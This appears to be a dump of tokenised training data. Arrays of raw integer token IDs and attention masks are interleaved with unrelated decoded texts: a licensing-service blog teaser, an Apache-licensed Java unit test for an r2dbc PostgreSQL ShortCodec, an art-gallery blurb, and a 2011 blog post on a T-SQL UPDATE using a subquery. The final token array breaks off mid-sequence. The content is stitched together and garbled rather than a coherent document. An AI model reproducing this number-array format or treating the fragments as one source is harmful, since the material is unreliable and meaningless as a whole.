[ 1, 4918, 11322, 13, 13, 8208, 17594, 30010, 29879, 17102, 16965, 3639, 304, 5208, 26825, 515, 3087, 5043, 11563, 339, 6926, 13, 13, 29909, 316, 6332, 1156, 540, 471, 937, 18195, 287, 491, 278, 5208, 26825, 322, 15569, 925, 29871, 29896, 29953, 14433, 297, 29871, 29947, 29900, 21712, 975, 4832, 2440, 29892, 278, 5208, 26825, 4846, 278, 11563, 339, 6926, 385, 443, 6550, 2164, 5253, 310, 24082, 6909, 9826, 304, 337, 29899, 562, 1548, 6375, 17102, 402, 536, 273, 29889, 13, 13, 30015, 2499, 273, 338, 263, 16413, 341, 8547, 4847, 1058, 12778, 1790, 26654, 28469, 304, 1749, 696, 2475, 3995, 11182, 18885, 26053, 1497, 29889, 13, 13, 20624, 326, 4695, 29892, 3508, 30010, 29873, 540, 29973, 13, 13, 29954, 14224, 29892, 1286, 29871, 29941, 29906, 29892, 15569, 29871, 29906, 29941, 14433, 411, 3087, 5043, 322, 750, 380, 9466, 411, 17612, 322, 678, 19701, 8278, 29889, 13, 13, 19346, 13, 13, 1523, 1860, 8898, 13, 13, 4806, 2437, 568, 366, 304, 671, 1749, 3440, 292, 7481, 304, 3033, 482, 297, 25483, 1319, 9678, 800, 1048, 5626, 297, 1749, 7881, 29889, 8512, 591, 437, 451, 758, 29899, 10525, 6589, 29892, 591, 23986, 278, 1492, 472, 599, 3064, 304, 3349, 738, 2472, 470, 17279, 393, 526, 443, 10653, 1319, 29892, 20616, 292, 29892, 633, 375, 573, 29892, 4303, 295, 681, 29892, 822, 314, 7606, 29892, 19726, 1600, 29892, 12799, 5397, 29892, 1277, 29876, 12122, 29892, 2600, 1662, 29892, 5704, 1760, 470, 6467, 704, 6929, 519, 304, 502, 29892, 322, 304, 2313, 2226, 738, 2472, 5181, 304, 15523, 278, 4307, 29892, 1072, 2785, 29892, 470, 5874, 2009, 29889, 1334, 1795, 9410, 2705, 2908, 738, 1404, 1058, 633, 6394, 1438, 5855, 29889, 13, 13, 3644, 366, 1074, 6589, 393, 366, 1284, 1283, 6270, 29892, 3113, 671, 278, 1346, 21979, 408, 512, 932, 6649, 403, 30024, 4682, 491, 16758, 292, 975, 278, 1492, 2625, 310, 278, 1400, 29892, 322, 28420, 1623, 373, 278, 16578, 393, 5692, 29889, 1394, 29892, 6958, 1749, 3863, 943, 491, 4876, 292, 17768, 1061, 29992, 3893, 15753, 29889, 510, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Tag license A few hours ago I launched my new licensing service as a beta release. I called the service “Project License”, just because that describes the product really well. Codename “Task HedgeHog” is a bit less descriptive. Project License makes it… Continue Reading →
[ 1, 10522, 13, 13, 506, 1947, 13, 13, 29909, 2846, 6199, 8020, 306, 15241, 590, 716, 7794, 575, 292, 2669, 408, 263, 21762, 6507, 29889, 306, 2000, 278, 2669, 1346, 7653, 19245, 9363, 925, 1363, 393, 16612, 278, 3234, 2289, 1532, 29889, 315, 397, 3871, 1346, 5398, 379, 12864, 29950, 468, 30024, 338, 263, 2586, 3109, 29037, 573, 29889, 8010, 19245, 3732, 372, 30098, 2866, 14150, 21439, 10309 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
/* * Copyright 2017-2020 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.r2dbc.postgresql.codec; import io.r2dbc.postgresql.client.Parameter; import io.r2dbc.postgresql.util.ByteBufUtils; import org.junit.jupiter.api.Test; import static io.r2dbc.postgresql.client.Parameter.NULL_VALUE; import static io.r2dbc.postgresql.client.ParameterAssert.assertThat; import static io.r2dbc.postgresql.message.Format.FORMAT_BINARY; import static io.r2dbc.postgresql.message.Format.FORMAT_TEXT; import static io.r2dbc.postgresql.type.PostgresqlObjectId.INT2; import static io.r2dbc.postgresql.type.PostgresqlObjectId.VARCHAR; import static io.r2dbc.postgresql.util.TestByteBufAllocator.TEST; import static org.assertj.core.api.Assertions.assertThat; import static org.assertj.core.api.Assertions.assertThatIllegalArgumentException; /** * Unit tests for {@link ShortCodec}. */ final class ShortCodecUnitTests { private static final int dataType = INT2.getObjectId(); @Test void constructorNoByteBufAllocator() { assertThatIllegalArgumentException().isThrownBy(() -> new ShortCodec(null)) .withMessage("byteBufAllocator must not be null"); } @Test void decode() { ShortCodec codec = new ShortCodec(TEST); assertThat(codec.decode(TEST.buffer(2).writeShort((short) 100), dataType, FORMAT_BINARY, Short.class)).isEqualTo((short) 100); assertThat(codec.decode(ByteBufUtils.encode(TEST, "100"), dataType, FORMAT_TEXT, Short.class)).isEqualTo((short) 100); } @Test void decodeNoByteBuf() { assertThat(new ShortCodec(TEST).decode(null, dataType, FORMAT_BINARY, Short.class)).isNull(); } @Test void decodeNoFormat() { assertThatIllegalArgumentException().isThrownBy(() -> new ShortCodec(TEST).decode(TEST.buffer(0), dataType, null, Short.class)) .withMessage("format must not be null"); } @Test void doCanDecode() { ShortCodec codec = new ShortCodec(TEST); assertThat(codec.doCanDecode(VARCHAR, FORMAT_BINARY)).isFalse(); assertThat(codec.doCanDecode(INT2, FORMAT_BINARY)).isTrue(); assertThat(codec.doCanDecode(INT2, FORMAT_TEXT)).isTrue(); } @Test void doCanDecodeNoType() { assertThatIllegalArgumentException().isThrownBy(() -> new ShortCodec(TEST).doCanDecode(null, null)) .withMessage("type must not be null"); } @Test void doEncode() { assertThat(new ShortCodec(TEST).doEncode((short) 100)) .hasFormat(FORMAT_BINARY) .hasType(INT2.getObjectId()) .hasValue(TEST.buffer(2).writeShort(100)); } @Test void doEncodeNoValue() { assertThatIllegalArgumentException().isThrownBy(() -> new ShortCodec(TEST).doEncode(null)) .withMessage("value must not be null"); } @Test void encodeNull() { assertThat(new ShortCodec(TEST).encodeNull()) .isEqualTo(new Parameter(FORMAT_BINARY, INT2.getObjectId(), NULL_VALUE)); } }
[ 1, 4949, 13, 334, 14187, 1266, 29871, 29906, 29900, 29896, 29955, 29899, 29906, 29900, 29906, 29900, 278, 2441, 4148, 470, 15717, 29889, 13, 334, 13, 334, 10413, 21144, 1090, 278, 13380, 19245, 29892, 10079, 29871, 29906, 29889, 29900, 313, 1552, 376, 29931, 293, 1947, 1496, 13, 334, 366, 1122, 451, 671, 445, 934, 5174, 297, 752, 13036, 411, 278, 19245, 29889, 13, 334, 887, 1122, 4017, 263, 3509, 310, 278, 19245, 472, 13, 334, 13, 334, 418, 2045, 597, 1636, 29889, 4288, 29889, 990, 29914, 506, 11259, 29914, 27888, 1430, 1660, 29899, 29906, 29889, 29900, 13, 334, 13, 334, 25870, 3734, 491, 22903, 4307, 470, 15502, 304, 297, 5007, 29892, 7047, 13, 334, 13235, 1090, 278, 19245, 338, 13235, 373, 385, 376, 3289, 8519, 29908, 350, 3289, 3235, 29892, 13, 334, 399, 1806, 8187, 2692, 399, 1718, 29934, 13566, 29059, 6323, 8707, 29928, 22122, 29903, 8079, 13764, 29979, 476, 22255, 29892, 2845, 4653, 470, 2411, 2957, 29889, 13, 334, 2823, 278, 19245, 363, 278, 2702, 4086, 14765, 1076, 11239, 322, 13, 334, 27028, 1090, 278, 19245, 29889, 13, 3776, 13, 13, 5113, 12013, 29889, 29878, 29906, 11140, 29889, 29272, 29889, 401, 29883, 29936, 13, 13, 5215, 12013, 29889, 29878, 29906, 11140, 29889, 29272, 29889, 4645, 29889, 9329, 29936, 13, 5215, 12013, 29889, 29878, 29906, 11140, 29889, 29272, 29889, 4422, 29889, 12901, 29933, 1137, 12177, 29936, 13, 5215, 1638, 29889, 18491, 29889, 29926, 786, 1524, 29889, 2754, 29889, 3057, 29936, 13, 13, 5215, 2294, 12013, 29889, 29878, 29906, 11140, 29889, 29272, 29889, 4645, 29889, 9329, 29889, 10074, 29918, 19143, 29936, 13, 5215, 2294, 12013, 29889, 29878, 29906, 11140, 29889, 29272, 29889, 4645, 29889, 9329, 14697, 29889, 9294, 7058, 29936, 13, 5215, 2294, 12013, 29889, 29878, 29906, 11140, 29889, 29272, 29889, 4906, 29889, 5809, 29889, 19094, 1299, 29918, 29933, 1177, 19926, 29936, 13, 5215, 2294, 12013, 29889, 29878, 29906, 11140, 29889, 29272, 29889, 4906, 29889, 5809, 29889, 19094, 1299, 29918, 16975, 29936, 13, 5215, 2294, 12013, 29889, 29878, 29906, 11140, 29889, 29272, 29889, 1853, 29889, 6747, 16153, 2061, 1204, 29889, 10192, 29906, 29936, 13, 5215, 2294, 12013, 29889, 29878, 29906, 11140, 29889, 29272, 29889, 1853, 29889, 6747, 16153, 2061, 1204, 29889, 29963, 15364, 29936, 13, 5215, 2294, 12013, 29889, 29878, 29906, 11140, 29889, 29272, 29889, 4422, 29889, 3057, 12901, 29933, 1137, 2499, 2029, 1061, 29889, 18267, 29936, 13, 5215, 2294, 1638, 29889, 9294, 29926, 29889, 3221, 29889, 2754, 29889, 14697, 1080, 29889, 9294, 7058, 29936, 13, 5215, 2294, 1638, 29889, 9294, 29926, 29889, 3221, 29889, 2754, 29889, 14697, 1080, 29889, 9294, 7058, 14126, 12018, 15730, 2451, 29936, 13, 13, 7918, 13, 334, 13223, 6987, 363, 26633, 2324, 13899, 3399, 29883, 1836, 13, 3776, 13, 8394, 770, 13899, 3399, 29883, 8325, 24376, 426, 13, 13, 1678, 2024, 2294, 2186, 938, 848, 1542, 353, 19578, 29906, 29889, 657, 2061, 1204, 890, 13, 13, 1678, 732, 3057, 13, 1678, 1780, 5823, 3782, 12901, 29933, 1137, 2499, 2029, 1061, 580, 426, 13, 4706, 4974, 7058, 14126, 12018, 15730, 2451, 2141, 275, 1349, 4708, 2059, 14885, 1599, 716, 13899, 3399, 29883, 29898, 4304, 876, 13, 9651, 869, 2541, 3728, 703, 10389, 29933, 1137, 2499, 2029, 1061, 1818, 451, 367, 1870, 1496, 13, 1678, 500, 13, 13, 1678, 732, 3057, 13, 1678, 1780, 21822, 580, 426, 13, 4706, 13899, 3399, 29883, 775, 29883, 353, 716, 13899, 3399, 29883, 29898, 18267, 416, 13, 13, 4706, 4974, 7058, 29898, 401, 29883, 29889, 13808, 29898, 18267, 29889, 9040, 29898, 29906, 467, 3539, 21322, 3552, 12759, 29897, 29871, 29896, 29900, 29900, 511, 848, 1542, 29892, 383, 12054, 1299, 29918, 29933, 1177, 19926, 29892, 13899, 29889, 1990, 8106, 275, 9843, 1762, 3552, 12759, 29897, 29871, 29896, 29900, 29900, 416, 13, 4706, 4974, 7058, 29898, 401, 29883, 29889, 13808, 29898, 12901, 29933, 1137, 12177, 29889, 12508, 29898, 18267, 29892, 376, 29896, 29900, 29900, 4968, 848, 1542, 29892, 383, 12054, 1299, 29918, 16975, 29892, 13899, 29889, 1990, 8106, 275, 9843, 1762, 3552, 12759, 29897, 29871, 29896, 29900, 29900, 416, 13, 1678, 500, 13, 13, 1678, 732, 3057, 13, 1678, 1780, 21822, 3782, 12901, 29933, 1137, 580, 426, 13, 4706, 4974, 7058, 29898, 1482, 13899, 3399, 29883, 29898, 18267, 467, 13808, 29898, 4304, 29892, 848, 1542, 29892, 383, 12054, 1299, 29918, 29933, 1177, 19926, 29892, 13899, 29889, 1990, 8106, 275, 7327, 890, 13, 1678, 500, 13, 13, 1678, 732, 3057, 13, 1678, 1780, 21822, 3782, 5809, 580, 426, 13, 4706, 4974, 7058, 14126, 12018, 15730, 2451, 2141, 275, 1349, 4708, 2059, 14885, 1599, 716, 13899, 3399, 29883, 29898, 18267, 467, 13808, 29898, 18267, 29889, 9040, 29898, 29900, 511, 848, 1542, 29892, 1870, 29892, 13899, 29889, 1990, 876, 13, 9651, 869, 2541, 3728, 703, 4830, 1818, 451, 367, 1870, 1496, 13, 1678, 500, 13, 13, 1678, 732, 3057, 13, 1678, 1780, 437, 6028, 2772, 401, 580, 426, 13, 4706, 13899, 3399, 29883, 775, 29883, 353, 716, 13899, 3399, 29883, 29898, 18267, 416, 13, 13, 4706, 4974, 7058, 29898, 401, 29883, 29889, 1867, 6028, 2772, 401, 29898, 29963, 15364, 29892, 383, 12054, 1299, 29918, 29933, 1177, 19926, 8106, 275, 8824, 890, 13, 4706, 4974, 7058, 29898, 401, 29883, 29889, 1867, 6028, 2772, 401, 29898, 10192, 29906, 29892, 383, 12054, 1299, 29918, 29933, 1177, 19926, 8106, 275, 5574, 890, 13, 4706, 4974, 7058, 29898, 401, 29883, 29889, 1867, 6028, 2772, 401, 29898, 10192, 29906, 29892, 383, 12054, 1299, 29918, 16975, 8106, 275, 5574, 890, 13, 1678, 500, 13, 13, 1678, 732, 3057, 13, 1678, 1780, 437, 6028, 2772, 401, 3782, 1542, 580, 426, 13, 4706, 4974, 7058, 14126, 12018, 15730, 2451, 2141, 275, 1349, 4708, 2059, 14885, 1599, 716, 13899, 3399, 29883, 29898, 18267, 467, 1867, 6028, 2772, 401, 29898, 4304, 29892, 1870, 876, 13, 9651, 869, 2541, 3728, 703, 1853, 1818, 451, 367, 1870, 1496, 13, 1678, 500, 13, 13, 1678, 732, 3057, 13, 1678, 1780, 437, 2369, 401, 580, 426, 13, 4706, 4974, 7058, 29898, 1482, 13899, 3399, 29883, 29898, 18267, 467, 1867, 2369, 401, 3552, 12759, 29897, 29871, 29896, 29900, 29900, 876, 13, 9651, 869, 5349, 5809, 29898, 19094, 1299, 29918, 29933, 1177, 19926, 29897, 13, 9651, 869, 5349, 1542, 29898, 10192, 29906, 29889, 657, 2061, 1204, 3101, 13, 9651, 869, 5349, 1917, 29898, 18267, 29889, 9040, 29898, 29906, 467, 3539, 21322, 29898, 29896, 29900, 29900, 2483, 13, 1678, 500, 13, 13, 1678, 732, 3057, 13, 1678, 1780, 437, 2369, 401, 3782, 1917, 580, 426, 13, 4706, 4974, 7058, 14126, 12018, 15730, 2451, 2141, 275, 1349, 4708, 2059, 14885, 1599, 716, 13899, 3399, 29883, 29898, 18267, 467, 1867, 2369, 401, 29898, 4304, 876, 13, 9651, 869, 2541, 3728, 703, 1767, 1818, 451, 367, 1870, 1496, 13, 1678, 500, 13, 13, 1678, 732, 3057, 13, 1678, 1780, 19750, 7327, 580, 426, 13, 4706, 4974, 7058, 29898, 1482, 13899, 3399, 29883, 29898, 18267, 467, 12508, 7327, 3101, 13, 9651, 869, 275, 9843, 1762, 29898, 1482, 24953, 29898, 19094, 1299, 29918, 29933, 1177, 19926, 29892, 19578, 29906, 29889, 657, 2061, 1204, 3285, 4265, 29918, 19143, 2483, 13, 1678, 500, 13, 13, 29913, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Artist Dan Hernandez has an awesome new show up in New York City at the Kim Foster Gallery, combining Renaissance theology with the iconography of early computer game art—or Space Invaders by way of the Book of Genesis.
[ 1, 3012, 391, 3951, 25962, 4182, 29920, 756, 385, 29663, 716, 1510, 701, 297, 1570, 3088, 4412, 472, 278, 12931, 383, 15664, 15230, 29892, 29299, 27263, 278, 3002, 411, 278, 9849, 5275, 310, 4688, 6601, 3748, 1616, 30003, 272, 14121, 15518, 24574, 491, 982, 310, 278, 6726, 310, 5739, 6656, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
My lessons in learning. The more I know, the more I realize I don't know Friday, April 8, 2011 Updating a Table Using a Select I recently had a situation at work where someone had exported data from our SQL Database into excel so they could update a column. Then they asked me to figure out how to update the data "my way", as they called it, so they didn't have to manually update all the changes. Coming from more of a programming background my first thought is to do things procedurally. I have done quite a bit of Perl and PHP coding so I would usually reach for a nice For Each loop and do it that way. Since T-SQL is set based I am having to retrain my brain to think in sets rather than procedures. So I had a table like this: pk_num new_val 1 NULL 2 NULL 3 NULL And I was given back a table like this: pk_num new_val 1 Frank 2 Joe 3 Sam After scratching my head and looking through my big stack of books I decided the best way to do this would be a subquery. Lets call the original table table1, I imported the new table into SQL and called it table2. Here is the code I ended up using: UPDATE table1 SET new_val = table2.new_val FROM (SELECT pk_num, new_val FROM table2) AS table2 WHERE table1.pk_num = table2.pk_num --------- EDIT: 8/16/2011 Since I am not using a where clause in the subquery, it is not actually needed. The query could be rewritten like it is below. I'm leaving it as an example and because it is the basis for the next part UPDATE table1 SET new_val = table2.new_val FROM table2 WHERE table1.pk_num = table2.pk_num --------- It was a bit more complicated than that in that I didn't want to overwrite existing values in the new_val field in the original table if there was no value in the field in the update table so the end result actually looked like this: UPDATE table1 SET new_val = table2.new_val FROM (SELECT pk_num, new_val FROM table2 WHERE new_val IS NOT null) AS table2 WHERE table1.pk_num = table2.pk_num Hope this helps someone. I know this is pretty basic stuff, but when you are just starting with T-SQL or, like me, are use to working with procedural or object oriented programming languages its's hard to train your brain to think in concepts like subqueries.
[ 1, 1619, 3109, 787, 297, 6509, 29889, 450, 901, 306, 1073, 29892, 278, 901, 306, 16289, 306, 1016, 29915, 29873, 1073, 13, 13, 29943, 2429, 388, 29892, 3786, 29871, 29947, 29892, 29871, 29906, 29900, 29896, 29896, 13, 13, 3373, 26747, 263, 6137, 5293, 263, 7605, 13, 13, 29902, 10325, 750, 263, 6434, 472, 664, 988, 4856, 750, 5609, 287, 848, 515, 1749, 3758, 5470, 964, 10616, 577, 896, 1033, 2767, 263, 1897, 29889, 1987, 896, 4433, 592, 304, 4377, 714, 920, 304, 2767, 278, 848, 376, 1357, 982, 613, 408, 896, 2000, 372, 29892, 577, 896, 3282, 29915, 29873, 505, 304, 7522, 2767, 599, 278, 3620, 29889, 422, 292, 515, 901, 310, 263, 8720, 3239, 590, 937, 2714, 338, 304, 437, 2712, 6449, 332, 635, 29889, 306, 505, 2309, 3755, 263, 2586, 310, 23907, 322, 5048, 14137, 577, 306, 723, 5491, 6159, 363, 263, 7575, 1152, 7806, 2425, 322, 437, 372, 393, 982, 29889, 4001, 323, 29899, 4176, 338, 731, 2729, 306, 626, 2534, 304, 337, 14968, 590, 17294, 304, 1348, 297, 6166, 3265, 1135, 28648, 29889, 13, 13, 6295, 306, 750, 263, 1591, 763, 445, 29901, 13, 13, 20571, 29918, 1949, 13, 13, 1482, 29918, 791, 13, 13, 29896, 13, 13, 10074, 13, 13, 29906, 13, 13, 10074, 13, 13, 29941, 13, 13, 10074, 13, 13, 2855, 306, 471, 2183, 1250, 263, 1591, 763, 445, 29901, 13, 13, 20571, 29918, 1949, 13, 13, 1482, 29918, 791, 13, 13, 29896, 13, 13, 7675, 29895, 13, 13, 29906, 13, 13, 29967, 7297, 13, 13, 29941, 13, 13, 22966, 13, 13, 13555, 22728, 292, 590, 2343, 322, 3063, 1549, 590, 4802, 5096, 310, 8277, 306, 8459, 278, 1900, 982, 304, 437, 445, 723, 367, 263, 1014, 1972, 29889, 365, 1691, 1246, 278, 2441, 1591, 1591, 29896, 29892, 306, 19673, 278, 716, 1591, 964, 3758, 322, 2000, 372, 1591, 29906, 29889, 2266, 338, 278, 775, 306, 9698, 701, 773, 29901, 13, 13, 14474, 1591, 29896, 13, 13, 10490, 13, 13, 1482, 29918, 791, 353, 1591, 29906, 29889, 1482, 29918, 791, 13, 13, 21482, 13, 13, 29898, 6404, 282, 29895, 29918, 1949, 29892, 716, 29918, 791, 13, 13, 21482, 1591, 29906, 29897, 3339, 1591, 29906, 13, 13, 22043, 13, 13, 2371, 29896, 29889, 20571, 29918, 1949, 353, 1591, 29906, 29889, 20571, 29918, 1949, 13, 13, 1378, 29899, 13, 12378, 29901, 29871, 29947, 29914, 29896, 29953, 29914, 29906, 29900, 29896, 29896, 13, 23036, 306, 626, 451, 773, 263, 988, 11845, 297, 278, 1014, 1972, 29892, 372, 338, 451, 2869, 4312, 29889, 450, 2346, 1033, 367, 337, 17625, 763, 372, 338, 2400, 29889, 306, 29915, 29885, 10124, 372, 408, 385, 1342, 322, 1363, 372, 338, 278, 8405, 363, 278, 2446, 760, 13, 14474, 1591, 29896, 13, 13, 10490, 13, 13, 1482, 29918, 791, 353, 1591, 29906, 29889, 1482, 29918, 791, 13, 13, 21482, 1591, 29906, 13, 13, 22043, 13, 13, 2371, 29896, 29889, 20571, 29918, 1949, 353, 1591, 29906, 29889, 20571, 29918, 1949, 13, 13, 1378, 29899, 13, 13, 3112, 471, 263, 2586, 901, 